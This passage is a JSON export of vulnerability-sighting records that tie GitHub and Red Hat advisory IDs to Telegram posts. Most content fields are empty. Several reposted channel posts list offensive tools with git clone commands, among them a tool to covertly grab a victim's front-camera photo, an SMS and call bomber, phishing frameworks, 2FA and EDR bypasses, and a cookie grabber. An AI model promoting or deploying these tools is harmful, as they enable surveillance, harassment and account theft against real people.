"published-proof-of-concept", "source": "Telegram/KQHgBG0pvBiePsgZbFhCl3OvqKepMrf4RCQXURbQUkhOgT4", "content": "", "creation_timestamp": "2025-04-06T23:30:47.000000Z"}, {"uuid": "8ee982a9-19ba-4098-a558-388e7f6e635c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QP8J-P87F-C8CC", "type": "published-proof-of-concept", "source": "Telegram/KQHgBG0pvBiePsgZbFhCl3OvqKepMrf4RCQXURbQUkhOgT4", "content": "", "creation_timestamp": "2025-04-06T23:30:47.000000Z"}, {"uuid": "4f466834-0bfb-4aca-a6e8-8ed1cac01ae8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P2Q6-PWH5-M6JR", "type": "published-proof-of-concept", "source": "Telegram/5dAdkBrkgoCoPXtqjNJ6teSKY8EEieVK1jkeeM1fkZslcgw", "content": "", "creation_timestamp": "2025-04-07T23:31:54.000000Z"}, {"uuid": "ddd11689-323d-47f2-a0ed-4f3782c84bf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-75M2-JHH5-J5G2", "type": "published-proof-of-concept", "source": "Telegram/5dAdkBrkgoCoPXtqjNJ6teSKY8EEieVK1jkeeM1fkZslcgw", "content": "", "creation_timestamp": "2025-04-07T23:31:54.000000Z"}, {"uuid": "09404a02-a7a6-457a-bf3f-e9fe8b0cde1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84M6-5M72-45FP", "type": "published-proof-of-concept", "source": "Telegram/5dAdkBrkgoCoPXtqjNJ6teSKY8EEieVK1jkeeM1fkZslcgw", "content": "", "creation_timestamp": "2025-04-07T23:31:54.000000Z"}, {"uuid": "de5928ca-a556-45d0-a7db-747c391d60a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F8R8-43HH-RGHM", "type": "published-proof-of-concept", "source": "Telegram/3EfgoDCgsZV2jrDoMOtiTNQ-3vGb1DmoSDddJ2HOXGt5OW4", "content": "", "creation_timestamp": "2025-04-07T22:30:13.000000Z"}, {"uuid": "2e6e63ae-1c3d-4fef-a3cd-164b0cba4f73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X684-96HH-833X", "type": "published-proof-of-concept", "source": "Telegram/UfSe-6EGS8jfJ09VFnjg91CLSsjj-4fD6Vt4UjLUJiXedlI", "content": "", "creation_timestamp": "2025-01-18T03:00:37.000000Z"}, {"uuid": "d4f49d88-08de-4ee5-8c04-32e9f61976e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G8C-WM8X-JFHW", "type": "published-proof-of-concept", "source": "Telegram/DuV8iUCxIXBbl9t6SczBxzChqbbn8lVOHpA0Wci_qR4AsgM", "content": "", "creation_timestamp": "2025-02-11T00:00:43.000000Z"}, {"uuid": "06b03d39-2bc2-4408-8378-a21da66418d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2VPQ-FH52-J3WV", "type": "published-proof-of-concept", "source": "Telegram/iPosWul0vPko4NOYwQGqcy8M6TKYF3_3U_ZMmp_mqwsDzY0", "content": "", "creation_timestamp": "2025-01-29T22:31:02.000000Z"}, {"uuid": "907e0c68-979b-44c4-9faf-67d5cac9355b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7HPQ-3G6W-PVHF", "type": "published-proof-of-concept", "source": "Telegram/dK9dkTvrn0tRhifIhon0dteFOucmqsRcjgBlg32fakAqe48", "content": "", "creation_timestamp": "2025-01-29T20:30:24.000000Z"}, {"uuid": "1225044c-2af4-4c8d-9135-4e5b7856a692", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MM6V-68QP-F9FW", "type": "seen", "source": "Telegram/r090prh8PzjJEh682vcQnlDcJfJK4dwz44titdcQaapqPXQ", "content": "", "creation_timestamp": "2025-02-13T03:00:57.000000Z"}, {"uuid": "6ca2fb05-e104-4ad0-9b22-1c46ea754a39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JVHM-GJRH-3H93", "type": "published-proof-of-concept", "source": "Telegram/jlMT5pQePgK5GBSq5wMoupEVU9UT7ofYY1WgfO6aSFHSaLY", "content": "", "creation_timestamp": "2025-03-19T22:01:14.000000Z"}, {"uuid": "3fa8f00c-9bfd-4cc5-95dc-2c08b3810001", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22Q5-9PHM-744V", "type": "published-proof-of-concept", "source": "Telegram/pKc-k4S4UpucBi-A8jZui2WxqHw-KLQAnPldAvhIPnjHqVQ", "content": "", "creation_timestamp": "2025-03-19T20:00:51.000000Z"}, {"uuid": "76903a1c-8176-4071-9867-08c70425ad8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GQ32-758C-3WM3", "type": "published-proof-of-concept", "source": "Telegram/pKc-k4S4UpucBi-A8jZui2WxqHw-KLQAnPldAvhIPnjHqVQ", "content": "", "creation_timestamp": "2025-03-19T20:00:51.000000Z"}, {"uuid": "ddeecb11-d539-478e-8651-142f6fd5c57c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5PHV-X8X4-83X5", "type": "published-proof-of-concept", "source": "Telegram/NQlvjHhG2-VIGa7A-fQOLEf1RIrC3ATUo7ji5TmFiVmJeeU", "content": "", "creation_timestamp": "2025-03-20T09:30:37.000000Z"}, {"uuid": "dd70cea3-8b9a-4c89-b3be-89018317289a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3PJ-WH35-FQ8W", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2767", "content": "https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w\n\nCVE-2024-36404\n#github  #poc", "creation_timestamp": "2024-07-09T08:10:17.000000Z"}, {"uuid": "aef65d09-e7ef-417e-8833-8403ebafee28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W7HP-2W2C-P636", "type": "published-proof-of-concept", "source": "Telegram/pCWefAz8NgtMQjK60Nt8tRL1XwN3sMZOhKLlzwYzNuYpUw4", "content": "", "creation_timestamp": "2025-01-08T20:30:50.000000Z"}, {"uuid": "0c5958b1-bce5-44b7-97ed-4a0d304ea86d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93MQ-9FFX-83M2", "type": "published-proof-of-concept", "source": "Telegram/k2hWLXjvKh8ojTF1EeSN0Mqc987DrfNzj7Aa-hb_f1HoriQ", "content": "", "creation_timestamp": "2025-03-17T16:33:06.000000Z"}, {"uuid": "81cb91cf-b660-4168-b437-ea5a37d5c504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X574-M823-4X7W", "type": "published-proof-of-concept", "source": "https://t.me/NinjaSec/28332", "content": "Umbrella is a file dropper dedicated to pentest, its download files on target system are execute them without a double execution of exe, only of embed.\n\ngit clone https://github.com/4w4k3\n\nWifiphisher\u00a0is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks. Wifiphisher can be further used to mount victim-customized web phishing attacks against the connected clients in order to capture credentials (e.g. from third party login pages or WPA/WPA2 Pre-Shared Keys) or infect the victim stations with malwares.\n\ngit clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision \n\nTermux repository for hacking tools and packages\n\nhttps://github.com/Hax4us/TermuxBlack\n\n#Termux\n\nThis channel is dedicated to educational purposes.\n\nEasY_HaCk is a tool for network scanning and information gathering\n\n\u2022 git clone https://github.com/sabri-zaki/EasY_HaCk\n\nWishphish is a Termux tool which using for hack someone's front camera using a permission link..we wanna port forwarding tools for generate link..and we can grab someone picture when he opened this link and give allow permission.\n\n\u2022 git clone https://github.com/kinghacker0/WishFish\n\nBLACKPHISH\n\nNOTE:This is still in BETA so you may see problems, please open an issue on GitHub and report them!\n\n$ git clone https://github.com/iinc0gnit0/BlackPhish\n\n#Termux\n\nserver.fs.deny bypassed when using ?raw?? \u00b7 Advisory \u00b7 vitejs/vite \u00b7 \n\nhttps://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w\n\nInstantly share code, notes, and snippets.\n\nhttps://gist.github.com/grugq/03167bed45e774551155\n\n0day Today is the ultimate database of exploits and vulnerabilities\n\nhttps://0day.today\n\n./Phone: a mobile phone forensic framework for security researchers and forensic experts.\n\nIt's now available on github, follow the instructions and you will get it up and running successfully.\n\nhttps://github.com/cyb3rfortr3ss/Phone\n\nKali Linux 2024.4! \n\nhttps://kali.org/blog/kali-linux-2024-4-release/\n\nContaining new default python, updates to gnome 47, raspberry pi imager improvements, nethunter updates and more! Check it out!\n\n#CyberBulletin\n\nURLFINDER\n\n- different sources (alienvault,commoncrawl etc)\n- filter by extensions/regex\n- very fast (122000+ URLs in 30 sec):\n\nhttps://github.com/projectdiscovery/urlfinder\n\nOSINT Tool For Research Social Media Accounts By Username\n\nhttps://github.com/AnkhCorp/Snoop\n\nA tool to identify technologies and services used by domains through their DNS footprints\n\nhttps://github.com/Elite-Security-Systems/radar\n\nTop 20 Bug Bounty Platforms \n \n- HackerOne\n- Bugcrowd\n- Synack\n- YesWeHack\n- Intigriti\n- Open Bug Bounty\n- Hacken Proof\n- Cobalt\n- ZeroCopter\n- Bugbounter\n- Detectify\n- SafeHats\n-Secuna\n- Vulnerability Lab\n- Yogosha\n- BugBounty.jp\n- CyberArmy\n- Hackrate\n- Bounty Factory\n- Immunefi\n\n\ud83e\udd77\n\nA collection of several hundred online tools for OSINT.\n\nhttps://github.com/cipher387/osint_stuff_tool_collection\n\nPEN-300 (OSEP) resource.\n \nhttps://github.com/In3x0rabl3/OSEP\n\nIf you know about hacking you know that, one of the\u00a0most fatal hacker attacks\u00a0is the Dos (denial of service) attack. XLR8_BOMBER\u00a0is\u00a0a Dos attack tool for SMS,\u00a0it\u00a0sends 100s of SMS as well as calls on someone's phone so that they cannot use their phone properly.\n\n\u2022 git clone https://github.com/khansaad1275/XLR8_BOMBER\n\nThe unique thing about this tool is that it also helps you to\u00a0bypass 2-factor authentication. This tool uses NGrok tunneling so you can use this tool on public networks.\u2076\n\n\u2022 git clone https://github.com/The-Boss-Hacker/BossAdv.git\n\nLazyMux is a tool that helps you to install and use multiple penetration testing and hacking tools on the Android system with ease.", "creation_timestamp": "2025-04-18T13:50:58.000000Z"}, {"uuid": "f8d0266f-ba1a-4b0f-91be-3574a0c271b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ88-6MR5-RCW8", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/23940", "content": "Tools - Hackers Factory \n\nA complete security assessment tool that supports common web security issues scanning and custom POC | Be sure to read the document before using.\n\nhttps://github.com/securi3ytalent/xray-automation\n\nInstantly share code, notes, and snippets\n\nhttps://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1\n\nEDR &amp; Antivirus Bypass to Gain Shell Access\n\nhttps://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access\n\nServe as a reverse proxy to protect your web services from attacks and exploits\n\nhttps://github.com/chaitin/SafeLine\n\n[Android] Display useful information about your device privacy\n\nhttps://github.com/akexorcist/ruam-mij-android\n\nMultiple bugs leading to info leak and remote code execution\n\nhttps://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8\n\nDownload all the wallpapers in MKBHD's \"Panels\" app\n\nhttps://github.com/nadimkobeissi/mkbsd\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-29T07:52:48.000000Z"}, {"uuid": "2b0ee2f4-08c4-48b6-aeb1-abd101f37c5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HH3-VJ32-GR6J", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3693", "content": "Tools  - Hackers Factory \n\nTookie-osint has a simple-to-use UI and is really straightforward. The main idea of Tookie-osint is to discover usernames that are requested from an input.\n\nhttps://github.com/Alfredredbird/tookie-osint\n\n#CyberDilara\n\nGPU poisoning; hide the payload inside the gpu memory.\n\nhttps://github.com/H1d3r/GPU_ShellCode\n\nThis is a simple obfuscator for WireGuard. It is designed to make it harder to detect WireGuard traffic by making it look like something else.\n\nhttps://github.com/ClusterM/wg-obfuscator\n\nSploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability.\n\nhttps://github.com/xaitax/SploitScan\n\nA shellcode runner write in Rust use\n\nhttps://github.com/b1tg/rs-shellcode\n\nKernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nZip Slip Vulnerability in .a Static Library Files.  Since the implemented measure can be bypassed, the vulnerability allows an attacker to extract files to any desired location within the server running #MobSF.\n\nhttps://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-4hh3-vj32-gr6j\n\nPython script to monitor your target continuously for new subdomains.\n\nhttps://github.com/faiyazahmad07/monitor_subdomains\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-27T06:59:30.000000Z"}, {"uuid": "130de841-a898-4bb1-a913-aabd8d3924f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2010:0970", "type": "published-proof-of-concept", "source": "https://t.me/anony_islamicTM/465", "content": "\u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u062a\u0645 \u0623\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0628\u062a\u0627\u0631\u064a\u062e07/12/2010. \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u062a\u0645 \u0646\u0634\u0631\u0647\u0627 \u0628\u062a\u0627\u0631\u064a\u062e 07/12/2010 \u0643\u0640 RHSA-2010:0970 \u0643\u0640 \u0627\u0633\u062a\u0634\u0627\u0631\u064a (CERT.org). \u064a\u0645\u0643\u0646 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0627\u0633\u062a\u0634\u0627\u0631\u0629 \u0645\u0646 \u0647\u0646\u0627 kb.cert.org.\n\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0647\u0630\u0647 \u062a\u0645 \u062a\u0633\u0645\u064a\u062a\u0647\u0627CVE-2010-4344. \u062a\u0645\u062a \u0625\u062d\u0627\u0644\u0629 \u0627\u0644\u0640 \u0633\u064a \u0641\u064a \u0623\u064a30/11/2010. \u064a\u0645\u0643\u0646 \u0634\u0646 \u0627\u0644\u0647\u062c\u0645\u0629 \u0627\u0644\u0625\u0644\u0643\u062a\u0631\u0648\u0646\u064a\u0629 \u0647\u0630\u0647 \u0639\u0646 \u0628\u0639\u062f. \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u062a\u0642\u0646\u064a\u0629 \u0645\u062a\u0648\u0641\u0631\u0629. \u0627\u0644\u062a\u0642\u0627\u0631\u064a\u0631 \u062a\u0634\u064a\u0631 \u0628\u0623\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0647\u0630\u0647 \u0630\u0627\u062a \u0634\u0647\u0631\u0629 \u0623\u0642\u0644 \u0645\u0646 \u0627\u0644\u0645\u062a\u0648\u0633\u0637. \u0647\u0646\u0627\u0644\u0643 \u0625\u0643\u0633\u0628\u0644\u0648\u064a\u062a \u0645\u062a\u0648\u0641\u0631\u0629. \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646 \u0627\u0644 \u0625\u0643\u0633\u0628\u0644\u0648\u064a\u062a \u0648\u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627. \u0633\u0639\u0631 \u0627\u0644 \u0625\u0643\u0633\u0628\u0644\u0648\u064a\u062a \u0647\u0630\u0647 \u064a\u062a\u0631\u0627\u0648\u062d \u0628\u062d\u0648\u0627\u0644\u064a \u062a\u0642\u0631\u064a\u0628\u0627\u064bUSD $0-$5k \u0641\u064a \u0647\u0630\u0647 \u0627\u0644\u0644\u062d\u0638\u0629.\n\n\u062a\u0645 \u0623\u0639\u062a\u0628\u0631\u0627\u0647\u0627 \u0639\u0644\u0649 \u0623\u0646\u0647\u0627 \u0641\u0639\u0627\u0644\u0629 \u0644\u0644\u063a\u0627\u064a\u0629. \u062a\u0633\u062a\u0637\u064a\u0639 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0625\u0643\u0633\u0628\u0644\u0648\u064a\u062a \u0645\u0646 \u0647\u0646\u0627 securityfocus.com. \u0628\u0645\u0627 \u0623\u0646\u0647\u0627 \u062b\u063a\u0631\u0629 \u0647\u062c\u0648\u0645 \u0641\u0648\u0631\u064a \u0641\u0642\u062f \u0643\u0627\u0646 \u0645\u062a\u0648\u0633\u0637 \u0633\u0639\u0631\u0647\u0627 \u0647\u0648 \u062a\u0642\u0631\u064a\u0628\u0627$0-$5k. \u0628\u0631\u0646\u0627\u0645\u062c \u0646\u064a\u0633\u0648\u0633 \u0644\u0641\u062d\u0635 \u0627\u0644\u0634\u0628\u0643\u0627\u062a \u064a\u0648\u0641\u0631 \u0645\u0644\u062d\u0642 \u0628\u0639\u0646\u0648\u0627\u064668160(Oracle Linux 4 / 5 : exim (ELSA-2010-0970)), \u064a\u0645\u0643\u0646\u0643 \u0645\u0646 \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0648\u062c\u0648\u062f \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629. \u0623\u0646\u0647\u0627 \u0645\u0635\u0646\u0641\u0629 \u0625\u0644\u0649 \u0639\u0627\u0626\u0644\u0629Oracle Linux Local Security Checks. \u0627\u0644\u0645\u0644\u062d\u0642 \u064a\u0639\u0645\u0644 \u0628\u062d\u0633\u0628 \u0627\u0644\u0635\u0646\u0641local. \u0648\u0647\u0648 \u064a\u0639\u062a\u0645\u062f \u0639\u0644\u0649 \u0627\u0644\u0645\u0646\u0641\u06300. \u062e\u062f\u0645\u0629 \u0641\u062d\u0635 \u0627\u0644\u0634\u0628\u0643\u0627\u062a \u0643\u0648\u064a\u0644\u0633 \u064a\u0645\u0643\u0646\u0647\u0627 \u0627\u0644\u0643\u0634\u0641 \u0639\u0646 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0628\u0648\u0627\u0633\u0637\u0629 \u0645\u0644\u062d\u0642118827 (Red Hat Update for Exim (RHSA-2010:0970)).\n\n\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0633\u062e\u0629 \u0625\u0644\u0649 \u0625\u0635\u062f\u0627\u06313.15 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u062d\u0644 \u0647\u0630\u0647 \u0627\u0644\u0645\u0634\u0643\u0644\u0629. \u062a\u0635\u062d\u064a\u062d \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u0647\u0630\u0647 \u064a\u0645\u0643\u0646 \u062a\u062d\u0645\u064a\u0644\u0647 \u0645\u0646 \u0647\u0646\u0627 git.exim.org. \u0646\u0646\u0635\u062d \u0628\u0640 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0645\u0643\u0648\u0646 \u0627\u0644\u0645\u062a\u0623\u062b\u0631 \u0628\u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629. \u0627\u0644\u062a\u0635\u062d\u064a\u062d \u062a\u0645 \u0646\u0634\u0631\u06472 \u0623\u064a\u0627\u0645 \u0628\u0639\u062f \u0627\u0644\u0627\u0641\u0635\u0627\u062d \u0639\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n\n\u0628\u0627\u0644\u0627\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0647\u0630\u0627 \u064a\u0645\u0643\u0646 \u0627\u0644\u0643\u0634\u0641 \u0648\u0645\u0646\u0639 \u0645\u062b\u0644 \u0647\u0630\u0647 \u0627\u0644\u0647\u062c\u0645\u0627\u062a \u0639\u0646 \u0637\u0631\u064a\u0642 \u0623\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0646\u0627\u0645\u062c \u062a\u0628\u0646\u0643 \u0628\u0648\u064a\u0646\u062a \u0645\u0639 \u0627\u0644\u0641\u0644\u062a\u0631 \u0647\u0630\u062710824. \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0647\u0630\u0647 \u062a\u0645 \u062a\u0633\u062c\u064a\u0644\u0647\u0627 \u0641\u064a \u0642\u0648\u0627\u0639\u062f \u0628\u064a\u0627\u0646\u0627\u062a \u0622\u062e\u0631\u0649: SecurityFocus (BID 45308), Secunia (SA40019), SecurityTracker (ID 1024858), Vulnerability Center (SBV-28629) , Tenable (68160).\n\n\nhttps://t.me/YCS_CVE", "creation_timestamp": "2021-11-19T16:44:48.000000Z"}, {"uuid": "1a6e6948-40fc-454e-b9e5-3ad90ac045a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/7847", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-05-25T15:33:16.000000Z"}, {"uuid": "a4f1646c-ce6a-4565-9ef9-65f54b484ac0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1415", "type": "seen", "source": "https://t.me/ctinow/211786", "content": "https://ift.tt/menJP4s\nRHSA-2024:1415: Important: edk2 security update", "creation_timestamp": "2024-03-19T18:16:32.000000Z"}, {"uuid": "a48d8c25-8e65-46aa-a277-58e019507c99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94VH-GPHV-8PM8", "type": "published-proof-of-concept", "source": "Telegram/k2hWLXjvKh8ojTF1EeSN0Mqc987DrfNzj7Aa-hb_f1HoriQ", "content": "", "creation_timestamp": "2025-03-17T16:33:06.000000Z"}, {"uuid": "48384174-5c98-453f-9709-2824da0de626", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W2RR-38WV-8RRP", "type": "published-proof-of-concept", "source": "Telegram/Q4kJo2F2oL-NbaJrfC6LO8-y_S2Us6LVpftgoL4QtCPuQVY", "content": "", "creation_timestamp": "2025-03-20T20:00:50.000000Z"}, {"uuid": "d678d8b9-fd12-4a02-b949-36e10c35c449", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QMG3-HPQR-GQVC", "type": "seen", "source": "Telegram/1nxUJd1r2Vl_i3BcLbYFmcRkQRAx1kOCE3f---QAF-WqkIU", "content": "", "creation_timestamp": "2025-03-19T16:30:54.000000Z"}, {"uuid": "1b661354-7c7b-4180-b003-48370784b5e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GW42-F939-FHVM", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3072", "content": "Tools - Hackers Factory \n\nLink-X \n\nA Hack-Via-Link ToolKit. Including: Camera, Voice, Location Etc*4\n\nhttps://github.com/Toxic-Noob/Link-X\n\n#infosec #pentesting #redteam\n\nStorm-Breaker\n\nSocial engineering tool [Access Webcam &amp; Microphone &amp; Location Finder] With Python.\n\nhttps://github.com/ultrasecurity/Storm-Breaker\n\n#infosec #pentesting #redteam\n\njsFinder\n\nA command-line tool written in Go that scans web pages to find JavaScript files linked in the HTML source code. It searches for any attribute that can contain a JavaScript file (e.g., src, href, data-main, etc.) and extracts the URLs of the files to a text file. The tool is designed to be simple to use, and it supports reading URLs from a file or from standard input.\n\nhttps://github.com/kacakb/jsfinder\n\n#infosec #pentesting #bugbounty\n\nCVE-2023-32315\n\nAdministration Console authentication bypass in openfire xmppserver.\n\nhttps://github.com/advisories/GHSA-gw42-f939-fhvm\n\n#cve #cybersecurity #infosec\n\nCrowdSec\n\nThe open-source and participative IPS able to analyze visitor behavior &amp; provide an adapted response to all kinds of attacks. It also leverages the crowd power to generate a global CTI database to protect the user network.\n\nhttps://github.com/crowdsecurity/crowdsec\n\n#cybersecurity #infosec\n\nLookyloo \n\nLookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other.\n\nhttps://github.com/Lookyloo/lookyloo\n\n#cybersecurity #infosec #pentesting\n\n\ud83e\udd96Velociraptor Docker\n\nDocker image for Velocidex Velociraptor.\n\nhttps://github.com/weslambert/velociraptor-docker\n\n#infosec #pentesting #bugbounty\n\nGato\n\nGitHub Attack Toolkit is an enumeration and attack tool that allows both blue teamers and offensive security practitioners to evaluate the blast radius of a compromised personal access token within a GitHub organization.\n\nhttps://github.com/praetorian-inc/gato\n\n#cybersecurity #infosec #pentesting\n\nOSINT QuickStart\n\nIncludes quick start guides for #Shodan and Censys #OSINT search engines.\n\nhttps://github.com/utilsec/osint\n\n#cybersecurity #infosec\n\nCookie-Graber-BOF\n\nC or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for #CobaltStrike.\n\nhttps://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF\n\n#infosec #pentesting #redteam\n\nGeacon\n\nPractice Go programming and implement #CobaltStrike's Beacon in Go\n\nhttps://github.com/darkr4y/geacon\n\n#infosec #pentesting #redteam\n\nRepeaterSearch\n\nThis #burpsuite plugin adds a search bar to Repeater that allows you to search Requests and/or Responses for a string. Regex is also supported.\n\nhttps://github.com/Static-Flow/RepeaterSearch\n\n#infosec #infosec #bugbounty\n\nPractical Windows Forensics\n\nA quick DIY approach for performing a digital forensic analysis on a Windows 10 system.\n\nhttps://github.com/bluecapesecurity/PWF\n\n#cybersecurity #infosec #forensic\n\nOWASP Domain Protect\n\nPrevent subdomain takeover...\n\nhttps://github.com/domain-protect/domain-protect\n\n#cybersecurity 